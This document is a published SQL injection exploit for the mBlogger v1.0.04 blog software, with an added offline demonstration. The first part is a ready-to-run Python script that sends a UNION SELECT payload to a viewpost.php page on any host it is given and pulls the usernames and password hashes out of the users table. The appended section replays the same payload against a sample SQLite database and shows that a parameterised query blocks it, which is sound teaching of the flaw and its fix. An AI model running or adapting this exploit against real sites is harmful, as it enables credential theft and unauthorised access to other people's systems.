mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit
Source: research[at]ptrace-security[dot]com   Author: Gianni   Published: 2010-09-02

#!/usr/bin/python
#
# Exploit Title:   mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit
# Date         :   31 August 2010
# Author       :   Ptrace Security (Gianni Gnesa [gnix])
# Contact      :   research[at]ptrace-security[dot]com
# Software Link:   http://sourceforge.net/projects/mblogger/
# Version      :   1.0.04
# Tested on    :   EasyPHP 5.3.1.0 for Windows
#
#
# Description
# ===========
#
# + viewpost.php => SQL Injection!!
#
# 30: $query = "SELECT id, name, subject, message, posted FROM posts WHERE
#     id = '$_GET[postID]'";
# 31: $result = mysql_query($query) or die(mysql_error());
# 32: while($row = mysql_fetch_array($result, MYSQL_ASSOC))
# 33: {
# 34:  echo "<div class='posttitle'>";
# 35:  echo "<h3>" . $row['subject'] . "</h3>";
# 36:  echo "</div>";
# 37:  echo "<div class='postbody'>";
# 38:  echo "<p> Posted by: " . $row['name'] . " on " . $row['posted'] . "</p>";
# 39:  echo "<p>" . $row['message'] . "</p>";
# 40:  echo "</div>";
# 41:  $postID = $row['id'];
# 42: }
#

import re
import sys
import http.client


def usage(prog):
    print('Usage  : ' + prog + ' <target> <path>\n')
    print('Example: ' + prog + ' localhost /mBlogger/')
    print('         ' + prog + ' www.target.com /complete/path/')
    return


def exploit(target, path):
    # URL-encoded postID value. Decoded it reads:
    #   -1' UNION SELECT 1,'h4x0r','credentials',
    #      CONCAT('<1>',username,':',password,'<2>'), NULL FROM users -- '
    # Five columns match the SELECT on line 30 of viewpost.php, so each
    # users row comes back rendered as a post; the <1>...<2> markers wrap
    # username:password so it can be pulled out of the HTML afterwards.
    payload  = 'viewpost.php?postID=-1%27%20UNION%20SELECT%201,%27h4x0r%27,%27'
    payload += 'credentials%27,CONCAT(%27%3C1%3E%27,username,%27:%27,password,'
    payload += '%27%3C2%3E%27),%20NULL%20FROM%20users%20--%20%27'

    print('[+] Sending HTTP Request')
    con = http.client.HTTPConnection(target)
    con.request('GET', path + payload)
    res = con.getresponse()

    if res.status != 200:
        print('[!] HTTP GET Request Failed')
        sys.exit(1)

    print('[+] Parsing HTTP Response')
    data = res.read().decode()
    # One match per injected row: the text between the CONCAT() markers.
    pattern = re.compile(r"<1>(.+?)<2>", re.M)

    print('[+] Information Extracted:\n')
    credentials = pattern.findall(data)
    for element in credentials:
        print(element)

    return


print('\n+-----------------------------------------------------------------------------+')
print('| mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit by Ptrace Security    |')
print('+-----------------------------------------------------------------------------+\n')

if len(sys.argv) != 3:
    usage(sys.argv[0])
else:
    exploit(sys.argv[1], sys.argv[2])

sys.exit(0)
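The following is an added example, not part of Ptrace Security's exploit or of mBlogger itself. It replays the exploit's postID payload offline against an in-memory SQLite copy of the two tables involved, so the UNION on line 30 can be watched end to end: the decoded parameter, the spliced query, the leaked username:password rows extracted with the same `<1>...<2>` regex, and then the same input against a parameterised version of the query, which returns nothing. Column names for `posts` come from viewpost.php line 30 and `username`/`password` from the payload; the rest of the `users` schema, the rows, and the password values are constructed sample data. SQLite has no `CONCAT()`, so one is registered to mimic MySQL's.

```python
import re
import sqlite3
import urllib.parse

# Query string the exploit sends (everything after "viewpost.php?"), verbatim.
EXPLOIT_QUERY = (
    'postID=-1%27%20UNION%20SELECT%201,%27h4x0r%27,%27'
    'credentials%27,CONCAT(%27%3C1%3E%27,username,%27:%27,password,'
    '%27%3C2%3E%27),%20NULL%20FROM%20users%20--%20%27'
)

# The exploit's marker regex: CONCAT() wraps each username:password in <1>...<2>.
MARKER = re.compile(r"<1>(.+?)<2>")


def build_db():
    """In-memory stand-in for mBlogger's database (constructed sample data).

    posts columns come from viewpost.php line 30, users.username/password from
    the payload; the remaining users schema and all rows are assumptions.
    """
    con = sqlite3.connect(':memory:')
    con.executescript("""
        CREATE TABLE posts(id INTEGER, name TEXT, subject TEXT,
                           message TEXT, posted TEXT);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO posts VALUES (1, 'alice', 'Hello', 'first post', '2010-08-31');
        INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO users VALUES ('bob',   'e10adc3949ba59abbe56e057f20f883e');
    """)
    # MySQL has CONCAT(); SQLite does not, so register an equivalent so the
    # payload runs unchanged (-1 = any number of arguments).
    con.create_function('CONCAT', -1, lambda *parts: ''.join(str(p) for p in parts))
    return con


def post_id_from_query(query_string):
    """What PHP places in $_GET['postID']: the URL-decoded parameter value."""
    return urllib.parse.parse_qs(query_string)['postID'][0]


def vulnerable_viewpost(con, post_id):
    """viewpost.php line 30 as written: the value is spliced into the SQL text."""
    sql = ("SELECT id, name, subject, message, posted FROM posts "
           "WHERE id = '%s'" % post_id)
    return con.execute(sql).fetchall()


def fixed_viewpost(con, post_id):
    """Hardened form: postID is bound as a parameter, never parsed as SQL."""
    sql = "SELECT id, name, subject, message, posted FROM posts WHERE id = ?"
    return con.execute(sql, (post_id,)).fetchall()


def leaked_credentials(rows):
    """Same extraction the exploit does on the HTML, applied to the message column."""
    return [m for row in rows for m in MARKER.findall(str(row[3]))]


def demo():
    """Run the payload through both query forms; returns (leaked, after_fix)."""
    con = build_db()
    post_id = post_id_from_query(EXPLOIT_QUERY)
    leaked = leaked_credentials(vulnerable_viewpost(con, post_id))
    after_fix = leaked_credentials(fixed_viewpost(con, post_id))
    return leaked, after_fix


if __name__ == '__main__':
    leaked, after_fix = demo()
    print('decoded postID          :', post_id_from_query(EXPLOIT_QUERY))
    print('vulnerable query leaks  :', leaked)
    print('parameterised query leaks:', after_fix)
```

The UNION works only because the injected SELECT lists exactly five expressions, one per column of the original query, and the trailing `-- '` comments out the quote PHP appends; with the bound parameter the whole string is compared against `id` as a single value and no row matches.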